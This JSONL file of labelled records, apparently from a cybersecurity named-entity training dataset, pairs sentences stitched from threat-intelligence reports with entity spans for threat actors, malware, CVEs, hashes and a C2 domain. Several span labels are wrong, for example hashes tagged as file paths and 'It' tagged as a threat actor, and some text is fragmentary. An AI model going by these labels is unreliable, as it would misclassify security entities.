{"text": "Deceptively , the app was listed in the Education section . It fetches the same FlawedAmmyy downloader .msi file , then downloads the FlawedAmmyy payload . The Lazarus Group employs a variety of RATs that operate in both client mode and server mode .", "spans": {"THREAT_ACTOR: It": [[60, 62]], "TOOL: FlawedAmmyy payload": [[134, 153]], "THREAT_ACTOR: Lazarus Group": [[160, 173]], "MALWARE: RATs": [[195, 199]]}, "info": {"id": "cyberner_stix_train_002628", "source": "cyberner_stix_train"}}
{"text": "RuMMS Code Analysis All RuMMS samples share the same behaviors , major parts of which are shown in Figure 1 . This realization suggests that the OilRig threat group will continue to use their delivery documents for extended periods with subtle modifications to remain effective . The below image shows the information about the sample before and after the cleaning . The challenge of investigating a vulnerable appliance for the exploitation CVE-2023 - 4966 is that the webserver running on the appliance does not record requests ( or errors ) to the vulnerable endpoint .", "spans": {"MALWARE: RuMMS": [[0, 5], [24, 29]], "THREAT_ACTOR: OilRig": [[145, 151]], "THREAT_ACTOR: threat group": [[152, 164]], "TOOL: delivery documents": [[192, 210]], "VULNERABILITY: CVE-2023 - 4966": [[442, 457]]}, "info": {"id": "cyberner_stix_train_002629", "source": "cyberner_stix_train"}}
{"text": "However , it has begun to target users all around the world , especially users in countries like China , Taiwan , France , Switzerland , Germany , United Kingdom , United States , and others . Rapid7 discovered that additional data was placed into the Dropbox accounts under control of the APT10 during the compromise and was able to attribute data that was placed into it as being owned by Visma . The group has carried out attacks most months since December 2017 .", "spans": {"ORGANIZATION: Rapid7": [[193, 199]], "THREAT_ACTOR: APT10": [[290, 295]]}, "info": {"id": "cyberner_stix_train_002630", "source": "cyberner_stix_train"}}
{"text": "Filename : ntslwin.exe MD5 : a13c864980159cd9bdc94074b2389dda Filename : ~de03fc12a.docm MD5 : 9d703d31795bac83c4dd90527d149796 .", "spans": {"FILEPATH: ntslwin.exe": [[11, 22]], "FILEPATH: a13c864980159cd9bdc94074b2389dda": [[29, 61]], "FILEPATH: ~de03fc12a.docm": [[73, 88]], "FILEPATH: 9d703d31795bac83c4dd90527d149796": [[95, 127]]}, "info": {"id": "cyberner_stix_train_002631", "source": "cyberner_stix_train"}}
{"text": "The Sofacy group ( AKA APT28 , Fancy Bear , STRONTIUM , Sednit , Tsar Team , Pawn Storm ) is a well-known adversary that remains highly active in the new calendar year of 2018 .", "spans": {"THREAT_ACTOR: Sofacy": [[4, 10]], "THREAT_ACTOR: APT28": [[23, 28]], "THREAT_ACTOR: Fancy Bear": [[31, 41]], "THREAT_ACTOR: STRONTIUM": [[44, 53]], "THREAT_ACTOR: Sednit": [[56, 62]], "THREAT_ACTOR: Tsar Team": [[65, 74]], "THREAT_ACTOR: Pawn Storm": [[77, 87]]}, "info": {"id": "cyberner_stix_train_002632", "source": "cyberner_stix_train"}}
{"text": "Strazzere 's colleague , Jon Sawyer , suggested on Twitter that the vulnerabilities might have not been there by mistake , but rather included as intentionally coded backdoors . We believe the groups moved to use CVE-2018-0798 instead of the other Microsoft Equation Editor Remote Code Execution (RCE) vulnerabilities because the former is more reliable as it works on all known versions of Equation Editor . Gh0stRAt Downloader : ce47e7827da145823a6f2b755975d1d2f5eda045b4c542c9b9d05544f3a9b974 .", "spans": {"ORGANIZATION: Twitter": [[51, 58]], "THREAT_ACTOR: groups": [[193, 199]], "VULNERABILITY: CVE-2018-0798": [[213, 226]], "MALWARE: Gh0stRAt Downloader": [[409, 428]], "FILEPATH: ce47e7827da145823a6f2b755975d1d2f5eda045b4c542c9b9d05544f3a9b974": [[431, 495]]}, "info": {"id": "cyberner_stix_train_002633", "source": "cyberner_stix_train"}}
{"text": "FireEye Labs detects this phishing attack and customers will be protected against the usage of these sites in possible future campaigns . According to statistics , Corkow primarily targets users in Russia and the CIS , but it is worth noting that in 2014 the amount of attacks targeting the USA increased by 5 times , in comparison with 2011 .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "MALWARE: Corkow": [[164, 170]], "ORGANIZATION: users": [[189, 194]]}, "info": {"id": "cyberner_stix_train_002634", "source": "cyberner_stix_train"}}
{"text": "Given the use of lure documents designed with social engineering in mind , it is likely that MuddyWater use phishing or spam to target users who are unaware of these documents ' malicious nature . After app installation , whenever SWAnalytics senses victims opening up infected applications or rebooting their phones , it silently uploads their entire contacts list to Hangzhou Shun Wang Technologies controlled servers .", "spans": {"ORGANIZATION: social engineering": [[46, 64]], "THREAT_ACTOR: MuddyWater": [[93, 103]], "FILEPATH: SWAnalytics": [[231, 242]]}, "info": {"id": "cyberner_stix_train_002635", "source": "cyberner_stix_train"}}
{"text": "This list is expected to expand : Package name Application name com.android.vending Play Market com.boursorama.android.clients Boursorama Banque com.caisseepargne.android.mobilebanking Banque com.chase.sig.android Chase Mobile com.clairmail.fth Fifth Third Mobile Banking com.connectivityapps.hotmail Connect for Hotmail com.google.android.gm Gmail com.imo.android.imoim imo free video calls and chat com.infonow.bofa Bank of America This allows them to expand their range of targets of hacking activities for financial profit , and in this regard , SectorJ04 group has been found to have hacked into a company’s internal network by using a spear phishing email targeting executives and employees of certain South Korean companies around February 2019 . Symantec discovered the most recent wave of Tick attacks in July 2015 , when BRONZE BUTLER compromised three different Japanese websites with a Flash ( .swf ) exploit to mount watering hole attacks .", "spans": {"SYSTEM: Play Market": [[84, 95]], "SYSTEM: Banque": [[138, 144], [185, 191]], "SYSTEM: Chase Mobile": [[214, 226]], "SYSTEM: Fifth Third Mobile Banking": [[245, 271]], "SYSTEM: Connect for Hotmail": [[301, 320]], "SYSTEM: Gmail": [[343, 348]], "SYSTEM: imo": [[371, 374]], "SYSTEM: Bank of America": [[418, 433]], "THREAT_ACTOR: SectorJ04": [[550, 559]], "ORGANIZATION: companies": [[721, 730]], "ORGANIZATION: Symantec": [[754, 762]], "THREAT_ACTOR: BRONZE BUTLER": [[831, 844]]}, "info": {"id": "cyberner_stix_train_002636", "source": "cyberner_stix_train"}}
{"text": "The group 's capabilities are more than the much discussed CVE-2012-0158 exploits over the past few years . Thus , Turla operators had access to some highly sensitive information ( such as emails sent by the German Foreign Office staff ) for almost a year .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "VULNERABILITY: CVE-2012-0158": [[59, 72]], "THREAT_ACTOR: Turla": [[115, 120]], "TOOL: emails": [[189, 195]], "ORGANIZATION: German Foreign Office staff": [[208, 235]]}, "info": {"id": "cyberner_stix_train_002637", "source": "cyberner_stix_train"}}
{"text": "Use mobile threat detection solutions for enhanced security . The malicious attachments purported to be invitations or drafts of the agenda for the conference . The threat actors associated with DRAGONFISH have previously focused their campaigns on targets in Southeast Asia , specifically those located in countries near the South China Sea .", "spans": {"MALWARE: malicious attachments": [[66, 87]], "TOOL: invitations": [[104, 115]], "TOOL: drafts of the agenda": [[119, 139]], "THREAT_ACTOR: actors": [[172, 178]], "THREAT_ACTOR: DRAGONFISH": [[195, 205]]}, "info": {"id": "cyberner_stix_train_002638", "source": "cyberner_stix_train"}}
{"text": "First of all the new package name is com.google.services , which can easily be confused with a legitimate Google service . \" With our latest research we now see how Greenbug has shifted away from HTTP-based C2 communication with Ismdoor . The THREEBYTE spear phishing incident ( while not yet attributed ) shared the following characteristics with the above HIGHTIDE campaign attributed to APT12 : The THREEBYTE backdoor was compiled two days after the HIGHTIDE backdoors ; Encrypted Channel APT29 has used multiple layers of encryption within malware to protect C2 communication .", "spans": {"ORGANIZATION: Google": [[106, 112]], "TOOL: Ismdoor": [[229, 236]], "MALWARE: THREEBYTE": [[243, 252]], "MALWARE: HIGHTIDE": [[358, 366]], "THREAT_ACTOR: APT12": [[390, 395]], "MALWARE: THREEBYTE backdoor": [[402, 420]], "MALWARE: HIGHTIDE backdoors": [[453, 471]], "THREAT_ACTOR: APT29": [[492, 497]]}, "info": {"id": "cyberner_stix_train_002639", "source": "cyberner_stix_train"}}
{"text": "RCSession — This basic RAT is installed via DLL side-loading , and CTU researchers observed BRONZE PRESIDENT installing it on multiple hosts during intrusions .", "spans": {"MALWARE: RCSession": [[0, 9]], "TOOL: DLL": [[44, 47]], "ORGANIZATION: CTU": [[67, 70]], "THREAT_ACTOR: BRONZE PRESIDENT": [[92, 108]]}, "info": {"id": "cyberner_stix_train_002640", "source": "cyberner_stix_train"}}
{"text": "In addition , we uncovered the IMEIs of the targeted individuals ( IMEIs will not be shared publicly for the privacy and safety of the victims ) as well as the types of exfiltrated content . Recently , we found several new versions of Carbon , a second stage backdoor in the Turla group arsenal . At startup , Svchost.exe checks the services part of the registry and constructs a list of services to load . At the end of There is a call to the main function of the malware that contains all its functionality .", "spans": {"TOOL: Carbon": [[235, 241]], "FILEPATH: Svchost.exe": [[310, 321]]}, "info": {"id": "cyberner_stix_train_002641", "source": "cyberner_stix_train"}}
{"text": "This is a very simple process , which is replacing their update file on SD card with its own malicious payload . In addition to built-in functionalities , the operators of Careto can upload additional modules which can perform any malicious task . Unlike the files described earlier , these executables are never written to the filesystem . The decoy installer ( Install%20Updater%20(V104.25.151)-stable.url ) is an Internet shortcut downloaded from another compromised WordPress site .", "spans": {"MALWARE: Careto": [[172, 178]], "SYSTEM: WordPress site": [[470, 484]]}, "info": {"id": "cyberner_stix_train_002642", "source": "cyberner_stix_train"}}
{"text": "The detection evasion techniques we observed in the Okrum malware include embedding the malicious payload within a legitimate PNG image , employing several anti-emulation and anti-sandbox tricks , as well as making frequent changes in implementation . Clever Kitten 's goal is to eventually be able to masquerade as a legitimate user by compromising credentials either through a pass-the-hash attack , or by dumping password hashes from a compromised host .", "spans": {"MALWARE: Okrum": [[52, 57]], "THREAT_ACTOR: Clever Kitten": [[252, 265]]}, "info": {"id": "cyberner_stix_train_002643", "source": "cyberner_stix_train"}}
{"text": "Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 . In that case , we observed Buhtrap using a local privilege escalation exploit , CVE-2019-1132 , against one of its victims .", "spans": {"MALWARE: malicious.DOC": [[86, 99]], "VULNERABILITY: Microsoft Common Controls vulnerability": [[119, 158]], "VULNERABILITY: CVE-2012-0158": [[161, 174]], "THREAT_ACTOR: Buhtrap": [[204, 211]], "VULNERABILITY: exploit": [[247, 254]], "VULNERABILITY: CVE-2019-1132": [[257, 270]]}, "info": {"id": "cyberner_stix_train_002644", "source": "cyberner_stix_train"}}
{"text": "Thanks to that project , we were able to extract his Facebook profile – which lists his studies at the aforementioned university . The attachment in these emails is a weaponized Microsoft Office document containing a malicious macro that – when enabled – leads to the download of Hancitor . SHA256 : 4585584fe7e14838858b24c18a792b105d18f87d2711c060f09e62d89fc3085b .", "spans": {"ORGANIZATION: Facebook": [[53, 61]], "MALWARE: Hancitor": [[280, 288]], "FILEPATH: 4585584fe7e14838858b24c18a792b105d18f87d2711c060f09e62d89fc3085b": [[300, 364]]}, "info": {"id": "cyberner_stix_train_002645", "source": "cyberner_stix_train"}}
{"text": "CozyDuke is not simply a malware toolset ; rather , it is a modular malware platform formed around a core backdoor component .", "spans": {"MALWARE: CozyDuke": [[0, 8]], "TOOL: backdoor": [[106, 114]]}, "info": {"id": "cyberner_stix_train_002646", "source": "cyberner_stix_train"}}
{"text": "Like the ChinaChopper web shell , the OwaAuth web shell requires a password .", "spans": {"MALWARE: ChinaChopper": [[9, 21]], "TOOL: web shell": [[22, 31], [46, 55]], "MALWARE: OwaAuth": [[38, 45]]}, "info": {"id": "cyberner_stix_train_002647", "source": "cyberner_stix_train"}}
{"text": "More details on the new USB stealers are available in the section on technical analysis .", "spans": {"TOOL: USB": [[24, 27]]}, "info": {"id": "cyberner_stix_train_002648", "source": "cyberner_stix_train"}}
{"text": "In addition to being signed with a stolen certificate , the identified hacktools had been used in suspicious activity against a US based health provider operating in India .", "spans": {}, "info": {"id": "cyberner_stix_train_002649", "source": "cyberner_stix_train"}}
{"text": "Compromising safety systems provides little value outside of disrupting operations .", "spans": {}, "info": {"id": "cyberner_stix_train_002650", "source": "cyberner_stix_train"}}
{"text": "Public cloud infrastructure is one of the main targets for Rocke . The victims for the 2014-2015 versions are generally IT and real estate/investment companies and in both cases , a small number of computers have been infected throughout Wild Neutron .", "spans": {"THREAT_ACTOR: Rocke": [[59, 64]], "ORGANIZATION: IT": [[120, 122]], "ORGANIZATION: real estate/investment companies": [[127, 159]], "THREAT_ACTOR: Wild Neutron": [[238, 250]]}, "info": {"id": "cyberner_stix_train_002651", "source": "cyberner_stix_train"}}
{"text": "The packer , besides making the static analysis more complex , will break the standard debugger . The threat actor 's known working hours align to Chinese Standard Time ( CST ) and its targeting corresponds to that of other known China-based threat actors , which supports our assessment that these campaigns are conducted by APT10 . Recently , our colleagues from ESET wrote about another supply chain attack in which BARIUM was also involved , that we believe is connected to this case as well . CrowdStrike Falcon will detect the OWASSRF exploit method described in this blog , and will block the method if the prevention setting for • None Monitor Exchange servers for signs of exploitation visible in IIS and Remote PowerShell logs using this script developed by CrowdStrike Services • None Consider application - level controls such as web application firewalls .", "spans": {"THREAT_ACTOR: threat actor": [[102, 114]], "THREAT_ACTOR: threat actors": [[242, 255]], "THREAT_ACTOR: APT10": [[326, 331]], "ORGANIZATION: ESET": [[365, 369]], "THREAT_ACTOR: BARIUM": [[419, 425]], "TOOL: CrowdStrike Falcon": [[498, 516]], "SYSTEM: Monitor Exchange servers": [[644, 668]], "ORGANIZATION: CrowdStrike Services": [[768, 788]]}, "info": {"id": "cyberner_stix_train_002652", "source": "cyberner_stix_train"}}
{"text": "The code implementation again seems that it has been added for testing purposes only . Trochilus RAT activity was discovered during both months of October and November 2015 . The backdoor connects to a command and control server at icc.ignorelist.com . Enterprise T1082 System Information Discovery During the SolarWinds Compromise , APT29 used fsutil to check available free space before executing actions that might create large files on disk .", "spans": {"DOMAIN: icc.ignorelist.com": [[232, 250]], "THREAT_ACTOR: the SolarWinds Compromise": [[306, 331]], "THREAT_ACTOR: APT29": [[334, 339]]}, "info": {"id": "cyberner_stix_train_002653", "source": "cyberner_stix_train"}}
{"text": "10002B55: Applicate Most of the strings inside the binary are encrypted using a homebrew XOR-based algorithm and reversed .", "spans": {}, "info": {"id": "cyberner_stix_train_002654", "source": "cyberner_stix_train"}}
{"text": "Triada ’ s functionality allows it to modify those messages , so the money is sent not to some app developer , but to the malware operators . Wild Neutron 's attacks in 2015 uses a stolen code signing certificate belonging to Taiwanese electronics maker Acer and an unknown Flash Player exploit . In addition to these instances , multiple Qatari organizations were the subject to spear phishing attacks carrying Helminth samples earlier this year .", "spans": {"MALWARE: Triada": [[0, 6]], "THREAT_ACTOR: Wild Neutron": [[142, 154]], "TOOL: stolen code signing certificate": [[181, 212]], "ORGANIZATION: electronics": [[236, 247]], "VULNERABILITY: Flash Player exploit": [[274, 294]], "ORGANIZATION: Qatari organizations": [[339, 359]], "MALWARE: Helminth samples": [[412, 428]]}, "info": {"id": "cyberner_stix_train_002655", "source": "cyberner_stix_train"}}
{"text": "But the malicious ip file does not contain any methods from the original ip file . On Nov. 27 , 2018 , Cisco 's Talos research division published a write-up outlining the contours of a sophisticated cyber espionage campaign it dubbed DNSpionage . RevengeHotels : a089efd7dd9180f9b726594bb6cf81ae . This downloader is unique per system and contains a customized backdoor written in Assembler .", "spans": {"ORGANIZATION: Cisco 's Talos": [[103, 117]], "THREAT_ACTOR: RevengeHotels": [[247, 260]], "FILEPATH: a089efd7dd9180f9b726594bb6cf81ae": [[263, 295]]}, "info": {"id": "cyberner_stix_train_002656", "source": "cyberner_stix_train"}}
{"text": "The targeting of an organization rather than individuals , and the high ransom demands , made BitPaymer stand out from other contemporary ransomware at the time . ScarCruft is a Korean-speaking and allegedly state-sponsored threat actor that usually targets organizations and companies with links to the Korean peninsula .", "spans": {"TOOL: BitPaymer": [[94, 103]], "THREAT_ACTOR: ScarCruft": [[163, 172]]}, "info": {"id": "cyberner_stix_train_002657", "source": "cyberner_stix_train"}}
{"text": "In the dangerous module lies a kill switch logic which looks for the keyword “ infect ” . We dove deeper into Confucius' operations—namely , the malware-ridden documents , backdoors , and file stealers they use in their campaigns . We have confirmed more than 20 hotels that are victims of the group , located in eight states in Brazil , but also in other countries such as Argentina , Bolivia , Chile , Costa Rica , France , Italy , Mexico , Portugal , Spain , Thailand and Turkey . Our recent reporting states that these operations are very likely aimed at stealing information and gaining persistent remote access .", "spans": {}, "info": {"id": "cyberner_stix_train_002658", "source": "cyberner_stix_train"}}
{"text": "While commercial solutions like Symantec pcAnywhere provide a larger feature-set , Winexe is lightweight , and doesn’t require any installation or configuration .", "spans": {"ORGANIZATION: Symantec": [[32, 40]], "TOOL: Winexe": [[83, 89]]}, "info": {"id": "cyberner_stix_train_002659", "source": "cyberner_stix_train"}}
{"text": "In the last few weeks , FormBook was seen downloading other malware families such as NanoCore . While the Sima moniker could similarly originate from software labels , it is a common female Persian name and a Persian-language Word for \" visage \" or \" appearance \" . Given its use in more advanced social engineering campaigns against women 's rights activists , the label seem particularly apt .", "spans": {"MALWARE: FormBook": [[24, 32]], "MALWARE: NanoCore": [[85, 93]], "TOOL: Word": [[226, 230]], "ORGANIZATION: social engineering campaigns": [[297, 325]], "ORGANIZATION: women 's rights activists": [[334, 359]]}, "info": {"id": "cyberner_stix_train_002660", "source": "cyberner_stix_train"}}
{"text": "INDRIK SPIDER uses file sharing platforms to distribute the BitPaymer decryptor . Researchers at Kaspersky Lab privately disclosed the flaw to Adobe after exploits against the zero-day were used in March by the ScarCruft APT gang in what Kaspersky Lab is calling Operation Daybreak .", "spans": {"THREAT_ACTOR: INDRIK SPIDER": [[0, 13]], "TOOL: file sharing platforms": [[19, 41]], "TOOL: BitPaymer decryptor": [[60, 79]], "ORGANIZATION: Kaspersky Lab": [[97, 110], [238, 251]], "VULNERABILITY: zero-day": [[176, 184]]}, "info": {"id": "cyberner_stix_train_002661", "source": "cyberner_stix_train"}}
{"text": "In their latest leak , they have released the UNITEDRAKE NSA exploit , which is a remote access and control tool that can remotely target Windows-based systems to capture desired information and transfer it to a server . Mac OS X will run the application if it passes certificates .", "spans": {"VULNERABILITY: UNITEDRAKE NSA exploit": [[46, 68]], "SYSTEM: Mac OS X": [[221, 229]]}, "info": {"id": "cyberner_stix_train_002662", "source": "cyberner_stix_train"}}
{"text": "More apps could be added to the grabber target list in the future , such as the ones that were targeted in older versions : Facebook WhatsApp Skype Twitter Chrome Instagram Snapchat Viber The following screenshot shows the generic card grabber overlay screen : Ginp generic grabber The current active target list is available in the appendix , containing a total of 24 unique targets . On August 30 , 2018 , APT10 deployed their first modified version of Trochilus that had its C2 communications encrypted using Salsa20 and RC4 ciphers instead of the more common RC4-encrypted Trochilus variant seen in the wild . The researcher of the company analyzed multiple threats , including Invader , Nioupale (Daserf ) and Hdoor found in an attack against an Asian financial institution .", "spans": {"SYSTEM: Facebook": [[124, 132]], "SYSTEM: WhatsApp": [[133, 141]], "SYSTEM: Skype": [[142, 147]], "SYSTEM: Twitter": [[148, 155]], "SYSTEM: Chrome": [[156, 162]], "SYSTEM: Instagram": [[163, 172]], "SYSTEM: Snapchat": [[173, 181]], "SYSTEM: Viber": [[182, 187]], "MALWARE: Ginp": [[261, 265]], "THREAT_ACTOR: APT10": [[408, 413]], "TOOL: Trochilus": [[455, 464]], "MALWARE: Invader": [[682, 689]], "MALWARE: Nioupale": [[692, 700]], "MALWARE: Hdoor": [[715, 720]]}, "info": {"id": "cyberner_stix_train_002663", "source": "cyberner_stix_train"}}
{"text": "The Red Alert Payload Once installed , the malware requests Device Administrator privileges . Similarly , APT37 targeting of a company located in Middle East in 2017 is also consistent with North Korean objectives given the entity 's extensive relationships inside North Korea . Some of these appear to be foreign diplomatic entities based in the . They once attacked a game server to illicitly farm in - game currency ( “ gaming gold ” , which also has real - world value ) and stole source codes of online game projects .", "spans": {"MALWARE: Red Alert Payload": [[4, 21]], "THREAT_ACTOR: APT37": [[106, 111]], "ORGANIZATION: game server": [[370, 381]]}, "info": {"id": "cyberner_stix_train_002664", "source": "cyberner_stix_train"}}
{"text": "We observe many behavioral similarities and unique strings across both the native-Downeks versions , and the new .NET Downeks versions .", "spans": {"MALWARE: native-Downeks": [[75, 89]], "TOOL: .NET": [[113, 117]]}, "info": {"id": "cyberner_stix_train_002665", "source": "cyberner_stix_train"}}
{"text": "Instead ,the payload is executed in standalone mode by rundll32.exe .", "spans": {"FILEPATH: rundll32.exe": [[55, 67]]}, "info": {"id": "cyberner_stix_train_002666", "source": "cyberner_stix_train"}}
{"text": "Figure 11 . SecureWorks Counter Threat Unit ( CTU ) researchers analyzed a phishing campaign that targeted a Middle Eastern organization in early January 2017 . In this instance , the payload is fully contained within the image’s pixel color codes , leaving no remaining data beyond the IEND marker . DOUBLEDRAG attempts to download a second - stage obfuscated PowerShell memory - only dropper , which Mandiant tracks as DOUBLEDROP , that will launch a backdoor into memory .", "spans": {"ORGANIZATION: SecureWorks Counter Threat Unit": [[12, 43]], "ORGANIZATION: CTU": [[46, 49]], "ORGANIZATION: organization": [[124, 136]], "TOOL: DOUBLEDRAG": [[301, 311]], "ORGANIZATION: Mandiant": [[402, 410]], "TOOL: DOUBLEDROP": [[421, 431]]}, "info": {"id": "cyberner_stix_train_002667", "source": "cyberner_stix_train"}}
{"text": "If the connection test is successful , the malware runs and attempts to communicate with the C&C domain over ports 443 and 8443 .", "spans": {"TOOL: C&C": [[93, 96]]}, "info": {"id": "cyberner_stix_train_002668", "source": "cyberner_stix_train"}}
{"text": "The C2 can also use WebSocket as a backup communication channel . Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . APT38 is a financially motivated North Korean regime-backed group responsible for conducting destructive attacks against financial institutions , as well as some of the world 's largest cyber heists .", "spans": {"MALWARE: Mimikatz": [[66, 74]], "THREAT_ACTOR: APT38": [[171, 176]], "ORGANIZATION: financial institutions": [[292, 314]], "THREAT_ACTOR: cyber heists": [[357, 369]]}, "info": {"id": "cyberner_stix_train_002669", "source": "cyberner_stix_train"}}
{"text": "Technical Analysis “ Agent Smith ” has a modular structure and consists of the following modules : Loader Core Boot Patch AdSDK Updater As stated above , the first step of this infection chain is the dropper . Unit 42 enumerated the threat infrastructure related to Bookworm and created a chart to visualize connected entities to its current attack campaign . More importantly , one year ’s worth of intelligence helped us gain insight not only into the goals and motivations of Dexphot ’s authors , but of cybercriminals in general . Spearphishing Attachment APT29 has used spearphishing emails with an attachment to deliver files with exploits to initial victims.002 Phishing : Spearphishing Link APT29 has used spearphishing with a link to trick victims into clicking on a link to a zip file containing malicious files.003 Phishing : Spearphishing via Service APT29 has used the legitimate mailing service Constant Contact to send phishing e - mails .003", "spans": {"MALWARE: Agent Smith": [[21, 32]], "ORGANIZATION: Unit 42": [[210, 217]], "TOOL: Bookworm": [[266, 274]], "MALWARE: Dexphot": [[479, 486]], "THREAT_ACTOR: Spearphishing Attachment APT29": [[535, 565]], "THREAT_ACTOR: Spearphishing Link APT29": [[680, 704]], "THREAT_ACTOR: Spearphishing via Service APT29": [[837, 868]]}, "info": {"id": "cyberner_stix_train_002670", "source": "cyberner_stix_train"}}
{"text": "The malware was discovered by Palo Alto Networks Unit 42 and ClearSky Cyber Security , and publicized in April 2017 in the Targeted Attacks in the Middle East Using KASPERAGENT and MICROPSIA blog .", "spans": {"ORGANIZATION: Palo Alto Networks": [[30, 48]], "ORGANIZATION: Unit 42": [[49, 56]], "ORGANIZATION: ClearSky Cyber Security": [[61, 84]], "MALWARE: KASPERAGENT": [[165, 176]], "MALWARE: MICROPSIA": [[181, 190]]}, "info": {"id": "cyberner_stix_train_002671", "source": "cyberner_stix_train"}}
{"text": "Additionally , we have determined that though original reports of this story attribute this surveillanceware tool to Hamas , this may not be the case , as we demonstrate below . However , despite the similarities to previous Turla campaigns , we believe that WhiteBear is a distinct project with a separate focus . Each value is a REG_MULTI_SZ value and contains the services that run under that Svchost group . A Microsoft Exchange server is composed of two major components : the frontend , also known as the Client Access Service , and the backend .", "spans": {"ORGANIZATION: Hamas": [[117, 122]], "TOOL: WhiteBear": [[259, 268]], "TOOL: Svchost": [[396, 403]], "TOOL: Microsoft Exchange": [[414, 432]], "TOOL: Client Access Service": [[511, 532]]}, "info": {"id": "cyberner_stix_train_002672", "source": "cyberner_stix_train"}}
{"text": "This malicious app , detected by ESET as a variant of Android/Twitoor.A , can ’ t be found on any official Android app store – it probably spreads by SMS or via malicious URLs . Alpha’s early role was fairly simple: engage with individuals , who he chose based on the goods they were selling , and then provide personal shipping addresses back to Omega . We are confident this KillDisk malware was deployed by Lazarus , rather than by another , unrelated attacker .", "spans": {"ORGANIZATION: ESET": [[33, 37]], "MALWARE: Android/Twitoor.A": [[54, 71]], "SYSTEM: Android app store": [[107, 124]], "THREAT_ACTOR: Alpha’s": [[178, 185]], "MALWARE: KillDisk": [[377, 385]], "MALWARE: malware": [[386, 393]], "THREAT_ACTOR: Lazarus": [[410, 417]], "THREAT_ACTOR: attacker": [[455, 463]]}, "info": {"id": "cyberner_stix_train_002673", "source": "cyberner_stix_train"}}
{"text": "] comarnani [ . Around the same time , WildFire also captured an e-mail containing a Word document ( \" hello.docx \" ) with an identical hash as the earlier Word document , this time sent to a U.S. Government recipient . We have observed APT1 intruders log in to their hop point , start the C2 server , wait for incoming connections , and then proceed to give commands to victim systems . Since as - a - service or commodity malware can include all types of malware , it can be tough to provide specific advice for detection and prevention .", "spans": {"ORGANIZATION: WildFire": [[39, 47]], "MALWARE: Word document": [[85, 98], [156, 169]], "MALWARE: hello.docx": [[103, 113]], "THREAT_ACTOR: APT1": [[237, 241]], "TOOL: C2": [[290, 292]], "MALWARE: commodity malware": [[414, 431]]}, "info": {"id": "cyberner_stix_train_002674", "source": "cyberner_stix_train"}}
{"text": "Of note , we also discovered the Sofacy group using a very similar delivery document to deliver a new Trojan called Cannon .", "spans": {"THREAT_ACTOR: Sofacy": [[33, 39]], "MALWARE: Trojan": [[102, 108]], "MALWARE: Cannon": [[116, 122]]}, "info": {"id": "cyberner_stix_train_002675", "source": "cyberner_stix_train"}}
{"text": "PC malware first introduced this technique which is becoming a trend in mobile malware having been adopted by several malware families including Dendroid . These spearphishing attempts represent an evolution of Iranian actors based on their social engineering tactics and narrow targeting . Interestingly , this actor targeted financial entities and companies in one African country , which lead us to think that CopyPaste was associated with cybermercenaries or a training center . Instead of using twitter ’s google - analytic account , we used an account we control .", "spans": {"MALWARE: Dendroid": [[145, 153]], "THREAT_ACTOR: CopyPaste": [[413, 422]], "SYSTEM: twitter ’s google - analytic account": [[500, 536]]}, "info": {"id": "cyberner_stix_train_002676", "source": "cyberner_stix_train"}}
{"text": "Rotexy then sent information about the smartphone to the C & C , including the phone model , number , name of the mobile network operator , versions of the operating system and IMEI . This alert 's IOC files provide HIDDEN COBRA indicators related to FALLCHILL . Working with U.S. Government partners , DHS and FBI identified Trojan malware variants used by the North Korean government – commonly known as HARDRAIN .", "spans": {"MALWARE: Rotexy": [[0, 6]], "MALWARE: IOC files": [[198, 207]], "THREAT_ACTOR: HIDDEN COBRA": [[216, 228]], "TOOL: FALLCHILL": [[251, 260]], "ORGANIZATION: U.S. Government": [[276, 291]], "ORGANIZATION: DHS": [[303, 306]], "ORGANIZATION: FBI": [[311, 314]], "MALWARE: Trojan": [[326, 332]], "MALWARE: malware": [[333, 340]], "MALWARE: HARDRAIN": [[406, 414]]}, "info": {"id": "cyberner_stix_train_002677", "source": "cyberner_stix_train"}}
{"text": "Throughout this blog post I present my analysis and thought process during this research , but if you would just like a list of the findings , they are over on our Unit42 GitHub .", "spans": {"ORGANIZATION: Unit42": [[164, 170]], "TOOL: GitHub": [[171, 177]]}, "info": {"id": "cyberner_stix_train_002678", "source": "cyberner_stix_train"}}
{"text": "Some versions of the Trojan can autonomously retrieve confirmation codes from such SMS and send them to the required number . If the OwaAuth web shell is ineffective because the victim uses two-factor authentication for webmail , TG-3390 identify other externally accessible servers and deploy ChinaChopper web shells . Meanwhile , the group uses a wide range of IP addresses as input for scanning activities that are grouped by country , allowing them to attack certain regions or areas within particular periods of the year , as previously observed . This could indicate a lack of coordination across different individuals or operational subteams involved in the attack .", "spans": {"TOOL: OwaAuth web shell": [[133, 150]], "THREAT_ACTOR: TG-3390": [[230, 237]]}, "info": {"id": "cyberner_stix_train_002679", "source": "cyberner_stix_train"}}
{"text": "Since they were first identified in January 2-16 , this adversary has consistently targeted large organizations for high ransom demands . The new threat actor group was eventually named Silence .", "spans": {}, "info": {"id": "cyberner_stix_train_002680", "source": "cyberner_stix_train"}}
{"text": "One of the uses the malware gives to this package is the execution of the command \" dumpsys '' to determine if certain activities are running . In the known spear phishing attacks by the Callisto Group , they employed the \" Scout \" malware tool from the RCS Galileo platform . RIPTIDE and HIGHTIDE differ on several points : executable file location , image base address , the User-Agent within the GET requests , and the format of the URI . During the SolarWinds Compromise , APT29 added their own devices as allowed IDs for active sync using Set - CASMailbox , allowing it to obtain copies of victim mailboxes .", "spans": {"THREAT_ACTOR: Callisto Group": [[187, 201]], "TOOL: Scout": [[224, 229]], "THREAT_ACTOR: Galileo": [[258, 265]], "MALWARE: RIPTIDE": [[277, 284]], "MALWARE: HIGHTIDE": [[289, 297]], "TOOL: URI": [[436, 439]], "THREAT_ACTOR: SolarWinds Compromise": [[453, 474]], "THREAT_ACTOR: APT29": [[477, 482]]}, "info": {"id": "cyberner_stix_train_002681", "source": "cyberner_stix_train"}}
{"text": "The following new samples were likely delivered via similar spear phishing campaigns as described in IBM 's research .", "spans": {"ORGANIZATION: IBM": [[101, 104]]}, "info": {"id": "cyberner_stix_train_002682", "source": "cyberner_stix_train"}}
{"text": "Its installation in a temporary directory alongside network reconnaissance and enumeration tools likely indicates malicious intent .", "spans": {}, "info": {"id": "cyberner_stix_train_002683", "source": "cyberner_stix_train"}}
